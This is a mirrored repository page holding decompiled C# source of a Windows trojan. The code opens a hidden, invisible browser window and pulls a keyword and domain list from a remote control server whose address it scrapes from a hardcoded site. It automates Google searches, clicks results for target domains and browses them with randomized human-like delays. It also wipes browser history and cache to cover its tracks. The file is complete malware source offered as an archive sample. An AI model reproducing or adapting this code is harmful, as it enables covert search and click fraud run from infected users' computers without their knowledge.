mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
381 lines
13 KiB
C#
381 lines
13 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: browser_bastan.Form1
|
|||
|
// Assembly: WinData, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 162322D2-FE3A-45B9-99E4-3519564A1D4D
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.kkro-82cd479bb60c59525668e5016b400a8cc48f04b14a5c6cad5e2c6046b301e79d.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.ComponentModel;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Drawing;
|
|||
|
using System.Net;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
using System.Text.RegularExpressions;
|
|||
|
using System.Threading;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace browser_bastan
|
|||
|
{
|
|||
|
public sealed class Form1 : Form
|
|||
|
{
|
|||
|
private const int GWL_EXSTYLE = -20;
|
|||
|
private const int WS_EX_TOOLWINDOW = 128;
|
|||
|
private const int INTERNET_OPTION_END_BROWSER_SESSION = 42;
|
|||
|
private IContainer components;
|
|||
|
private WebBrowser webBrowser1;
|
|||
|
private string ana = "http://www.nurullahuzmez.com";
|
|||
|
private string baba = "http://[DEGISTIR]/v/v.php";
|
|||
|
private Queue<KeyValuePair<string, string>> kelimelistesi = new Queue<KeyValuePair<string, string>>();
|
|||
|
private string kelime;
|
|||
|
private string domain;
|
|||
|
private int suankisayfa = 1;
|
|||
|
private Dictionary<string, bool> gezilenler = new Dictionary<string, bool>();
|
|||
|
private Random rnd = new Random();
|
|||
|
|
|||
|
protected override void Dispose(bool disposing)
|
|||
|
{
|
|||
|
if (disposing && this.components != null)
|
|||
|
this.components.Dispose();
|
|||
|
base.Dispose(disposing);
|
|||
|
}
|
|||
|
|
|||
|
private void InitializeComponent()
|
|||
|
{
|
|||
|
this.webBrowser1 = new WebBrowser();
|
|||
|
this.SuspendLayout();
|
|||
|
this.webBrowser1.Dock = DockStyle.Fill;
|
|||
|
this.webBrowser1.IsWebBrowserContextMenuEnabled = false;
|
|||
|
this.webBrowser1.Location = new Point(0, 0);
|
|||
|
this.webBrowser1.Name = "webBrowser1";
|
|||
|
this.webBrowser1.ScriptErrorsSuppressed = true;
|
|||
|
this.webBrowser1.Size = new Size(761, 488);
|
|||
|
this.webBrowser1.TabIndex = 0;
|
|||
|
this.webBrowser1.WebBrowserShortcutsEnabled = false;
|
|||
|
this.webBrowser1.DocumentCompleted += new WebBrowserDocumentCompletedEventHandler(this.webBrowser1_DocumentCompleted);
|
|||
|
this.webBrowser1.NewWindow += new CancelEventHandler(this.webBrowser1_NewWindow);
|
|||
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|||
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|||
|
this.ClientSize = new Size(761, 488);
|
|||
|
this.Controls.Add((Control) this.webBrowser1);
|
|||
|
this.Name = nameof (Form1);
|
|||
|
this.Opacity = 0.0;
|
|||
|
this.ShowIcon = false;
|
|||
|
this.ShowInTaskbar = false;
|
|||
|
this.StartPosition = FormStartPosition.CenterScreen;
|
|||
|
this.Load += new EventHandler(this.Form1_Load);
|
|||
|
this.ResumeLayout(false);
|
|||
|
}
|
|||
|
|
|||
|
[DllImport("user32.dll")]
|
|||
|
public static extern bool SetForegroundWindow(IntPtr hWnd);
|
|||
|
|
|||
|
[DllImport("user32.dll")]
|
|||
|
public static extern int SetWindowLong(IntPtr window, int index, int value);
|
|||
|
|
|||
|
[DllImport("user32.dll")]
|
|||
|
public static extern int GetWindowLong(IntPtr window, int index);
|
|||
|
|
|||
|
[DllImport("winmm.dll")]
|
|||
|
public static extern int sndPlaySound(string lpszSoundName, int uFlags);
|
|||
|
|
|||
|
[DllImport("wininet.dll", SetLastError = true)]
|
|||
|
private static extern bool InternetSetOption(
|
|||
|
IntPtr hInternet,
|
|||
|
int dwOption,
|
|||
|
IntPtr lpBuffer,
|
|||
|
int lpdwBufferLength);
|
|||
|
|
|||
|
public Form1() => this.InitializeComponent();
|
|||
|
|
|||
|
private void webBrowser1_NewWindow(object sender, CancelEventArgs e) => e.Cancel = true;
|
|||
|
|
|||
|
private void Basla()
|
|||
|
{
|
|||
|
this.DeleteCache();
|
|||
|
try
|
|||
|
{
|
|||
|
this.suankisayfa = 1;
|
|||
|
KeyValuePair<string, string> keyValuePair = this.kelimelistesi.Dequeue();
|
|||
|
this.kelime = keyValuePair.Key;
|
|||
|
this.domain = keyValuePair.Value;
|
|||
|
while (this.webBrowser1.IsBusy)
|
|||
|
Thread.SpinWait(10000);
|
|||
|
this.webBrowser1.Navigate("http://www.google.com.tr");
|
|||
|
}
|
|||
|
catch (InvalidOperationException ex)
|
|||
|
{
|
|||
|
Environment.Exit(-1);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void KelimeleriCek()
|
|||
|
{
|
|||
|
using (WebClient webClient = new WebClient())
|
|||
|
{
|
|||
|
string str1 = "";
|
|||
|
try
|
|||
|
{
|
|||
|
str1 = webClient.DownloadString(this.baba);
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
Environment.Exit(-1);
|
|||
|
}
|
|||
|
string str2 = str1;
|
|||
|
char[] chArray = new char[1]{ '\n' };
|
|||
|
foreach (string str3 in str2.Split(chArray))
|
|||
|
{
|
|||
|
string[] strArray = str3.Trim().Split('|');
|
|||
|
try
|
|||
|
{
|
|||
|
string key = strArray[1];
|
|||
|
KeyValuePair<string, string> keyValuePair = new KeyValuePair<string, string>(strArray[0], key);
|
|||
|
this.gezilenler.Add(key, false);
|
|||
|
this.kelimelistesi.Enqueue(keyValuePair);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void BirineTikla()
|
|||
|
{
|
|||
|
if (!(this.webBrowser1.Document != (HtmlDocument) null))
|
|||
|
return;
|
|||
|
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
|
|||
|
{
|
|||
|
if (htmlElement.GetAttribute("name").Contains("btnG") || htmlElement.GetAttribute("name").Contains("btnK"))
|
|||
|
{
|
|||
|
htmlElement.RaiseEvent("onmouseover");
|
|||
|
htmlElement.RaiseEvent("onmousedown");
|
|||
|
htmlElement.InvokeMember("click");
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void ButonTikla(string attribute, string value)
|
|||
|
{
|
|||
|
if (!(this.webBrowser1.Document != (HtmlDocument) null))
|
|||
|
return;
|
|||
|
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
|
|||
|
{
|
|||
|
if (htmlElement.GetAttribute(attribute).Contains(value))
|
|||
|
{
|
|||
|
htmlElement.RaiseEvent("onmouseover");
|
|||
|
htmlElement.RaiseEvent("onmousedown");
|
|||
|
htmlElement.InvokeMember("click");
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void ButonaTekrarTikla(string attribute, string value)
|
|||
|
{
|
|||
|
if (!(this.webBrowser1.Document != (HtmlDocument) null))
|
|||
|
return;
|
|||
|
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("button"))
|
|||
|
{
|
|||
|
if (htmlElement.GetAttribute(attribute).Contains(value))
|
|||
|
{
|
|||
|
htmlElement.RaiseEvent("onmouseover");
|
|||
|
htmlElement.RaiseEvent("onmousedown");
|
|||
|
htmlElement.InvokeMember("click");
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void webBrowser1_DocumentCompleted(
|
|||
|
object sender,
|
|||
|
WebBrowserDocumentCompletedEventArgs e)
|
|||
|
{
|
|||
|
string str = e.Url.ToString();
|
|||
|
if (str == "http://www.google.com.tr/")
|
|||
|
this.SureliIslet((Form1.SureliFonksiyon) (() =>
|
|||
|
{
|
|||
|
this.TextBoxYaz("name", "q", this.kelime);
|
|||
|
this.SureliIslet(new Form1.SureliFonksiyon(this.SubmitForm), 4000, 5000);
|
|||
|
}), 2000, 4000);
|
|||
|
else if (str.StartsWith("http://www.google.com.tr") && str.Contains("hl=tr"))
|
|||
|
{
|
|||
|
int suankisayfa = this.suankisayfa;
|
|||
|
this.SureliIslet((Form1.SureliFonksiyon) (() =>
|
|||
|
{
|
|||
|
if (this.LinkeTikla(this.domain))
|
|||
|
return;
|
|||
|
this.SureliIslet(new Form1.SureliFonksiyon(this.Ilerle), 5000, 12000);
|
|||
|
}), 3000, 6000);
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
if (!str.Contains(this.domain) || str.StartsWith("http://www.google.com"))
|
|||
|
return;
|
|||
|
this.SureliIslet((Form1.SureliFonksiyon) (() =>
|
|||
|
{
|
|||
|
if (this.gezilenler[this.domain])
|
|||
|
return;
|
|||
|
this.gezilenler[this.domain] = true;
|
|||
|
this.RastGeleGez();
|
|||
|
}), 20000, 50000);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void SubmitForm()
|
|||
|
{
|
|||
|
if (!(this.webBrowser1.Document != (HtmlDocument) null))
|
|||
|
return;
|
|||
|
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("Form"))
|
|||
|
htmlElement.InvokeMember("submit");
|
|||
|
}
|
|||
|
|
|||
|
private void Ilerle()
|
|||
|
{
|
|||
|
++this.suankisayfa;
|
|||
|
foreach (HtmlElement link in this.webBrowser1.Document.Links)
|
|||
|
{
|
|||
|
if (link.OuterText == this.suankisayfa.ToString() || link.OuterText == this.suankisayfa.ToString() + " ")
|
|||
|
{
|
|||
|
link.RaiseEvent("onmouseover");
|
|||
|
link.RaiseEvent("onmousedown");
|
|||
|
link.InvokeMember("click");
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private void RastGeleGez()
|
|||
|
{
|
|||
|
if (!(this.webBrowser1.Document != (HtmlDocument) null))
|
|||
|
return;
|
|||
|
HtmlElementCollection elementsByTagName = this.webBrowser1.Document.GetElementsByTagName("a");
|
|||
|
List<HtmlElement> htmlElementList = new List<HtmlElement>(elementsByTagName.Count);
|
|||
|
if (elementsByTagName.Count > 0)
|
|||
|
{
|
|||
|
foreach (HtmlElement htmlElement in elementsByTagName)
|
|||
|
{
|
|||
|
if (htmlElement.GetAttribute("target") != "_blank" && !string.IsNullOrEmpty(htmlElement.InnerText) && this.NormalLink(htmlElement.GetAttribute("href")))
|
|||
|
htmlElementList.Add(htmlElement);
|
|||
|
}
|
|||
|
if (htmlElementList.Count > 0)
|
|||
|
{
|
|||
|
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmouseover");
|
|||
|
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].RaiseEvent("onmousedown");
|
|||
|
htmlElementList[this.rnd.Next(htmlElementList.Count - 1)].InvokeMember("click");
|
|||
|
htmlElementList.Clear();
|
|||
|
}
|
|||
|
}
|
|||
|
this.SureliIslet((Form1.SureliFonksiyon) (() => this.SureliIslet(new Form1.SureliFonksiyon(this.Basla), 240001, 241000)), 5000, 6000);
|
|||
|
}
|
|||
|
|
|||
|
private bool NormalLink(string url) => !url.EndsWith("xml") && !url.EndsWith("@") && !url.EndsWith("SetHomePage") && !url.EndsWith("AddFavorite") && !url.EndsWith(".jpg") && !url.EndsWith(".gif") && !url.EndsWith(".png") && !url.EndsWith(".rar") && !url.EndsWith(".zip") && !url.EndsWith(".vcf") && !url.EndsWith(".exe") && !url.EndsWith(".mp3") && !url.EndsWith(".mp4") && !url.EndsWith("mailto");
|
|||
|
|
|||
|
private void DeleteCache()
|
|||
|
{
|
|||
|
Process.Start(new ProcessStartInfo()
|
|||
|
{
|
|||
|
FileName = "RunDll32.exe",
|
|||
|
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 1"
|
|||
|
}).WaitForExit();
|
|||
|
Process.Start(new ProcessStartInfo()
|
|||
|
{
|
|||
|
FileName = "RunDll32.exe",
|
|||
|
Arguments = "InetCpl.cpl,ClearMyTracksByProcess 8"
|
|||
|
}).WaitForExit();
|
|||
|
Form1.InternetSetOption(IntPtr.Zero, 42, IntPtr.Zero, 0);
|
|||
|
}
|
|||
|
|
|||
|
private void TextBoxYaz(string att, string attname, string attvalue)
|
|||
|
{
|
|||
|
if (!(this.webBrowser1.Document != (HtmlDocument) null))
|
|||
|
return;
|
|||
|
foreach (HtmlElement htmlElement in this.webBrowser1.Document.GetElementsByTagName("input"))
|
|||
|
{
|
|||
|
if (htmlElement.GetAttribute(att).Equals(attname))
|
|||
|
htmlElement.SetAttribute("value", attvalue);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private bool LinkeTikla(string url)
|
|||
|
{
|
|||
|
bool flag = false;
|
|||
|
List<string> stringList = new List<string>();
|
|||
|
if (this.webBrowser1.Document != (HtmlDocument) null)
|
|||
|
{
|
|||
|
foreach (HtmlElement link in this.webBrowser1.Document.Links)
|
|||
|
{
|
|||
|
string attribute = link.GetAttribute("href");
|
|||
|
stringList.Add(attribute);
|
|||
|
if (!attribute.Contains("//webcache.googleusercontent.com") && !attribute.Contains("&q=related:") && link.GetAttribute("href").Contains(url))
|
|||
|
{
|
|||
|
link.RaiseEvent("onmouseover");
|
|||
|
link.RaiseEvent("onmousedown");
|
|||
|
link.InvokeMember("Click");
|
|||
|
flag = true;
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
return flag;
|
|||
|
}
|
|||
|
|
|||
|
private void SureliIslet(Form1.SureliFonksiyon x, int min, int max)
|
|||
|
{
|
|||
|
System.Windows.Forms.Timer timer = new System.Windows.Forms.Timer()
|
|||
|
{
|
|||
|
Interval = this.rnd.Next(min, max)
|
|||
|
};
|
|||
|
timer.Tick += (EventHandler) ((s, ev) =>
|
|||
|
{
|
|||
|
x();
|
|||
|
((System.Windows.Forms.Timer) s).Stop();
|
|||
|
((Component) s).Dispose();
|
|||
|
});
|
|||
|
timer.Start();
|
|||
|
}
|
|||
|
|
|||
|
private void PanelAyarla()
|
|||
|
{
|
|||
|
string newValue = "";
|
|||
|
WebHeaderCollection headerCollection1 = new WebHeaderCollection();
|
|||
|
headerCollection1.Add("User-Agent", "Mozilla/4.0 (compatiple; MSIE 6.0; Windows NT 5.1)");
|
|||
|
WebHeaderCollection headerCollection2 = headerCollection1;
|
|||
|
using (WebClient webClient = new WebClient()
|
|||
|
{
|
|||
|
Encoding = Encoding.Default,
|
|||
|
Headers = headerCollection2
|
|||
|
})
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
newValue = new Regex("1(.*?)2", RegexOptions.IgnoreCase | RegexOptions.Compiled).Match(webClient.DownloadString(this.ana)).Groups[1].ToString();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
Environment.Exit(-1);
|
|||
|
}
|
|||
|
}
|
|||
|
this.baba = this.baba.Replace("[DEGISTIR]", newValue);
|
|||
|
}
|
|||
|
|
|||
|
private void Form1_Load(object sender, EventArgs e)
|
|||
|
{
|
|||
|
this.Size = new Size(this.rnd.Next(1280, 1366), this.rnd.Next(600, 700));
|
|||
|
Form1.SetWindowLong(this.Handle, -20, Form1.GetWindowLong(this.Handle, -20) | 128);
|
|||
|
this.ieKontrol();
|
|||
|
this.PanelAyarla();
|
|||
|
this.KelimeleriCek();
|
|||
|
Araclar.DisableClickSounds();
|
|||
|
this.Basla();
|
|||
|
}
|
|||
|
|
|||
|
private void ieKontrol()
|
|||
|
{
|
|||
|
if (new WebBrowser().Version.Major < 7)
|
|||
|
Environment.Exit(-1);
|
|||
|
}
|
|||
|
|
|||
|
private delegate void SureliFonksiyon();
|
|||
|
}
|
|||
|
}
|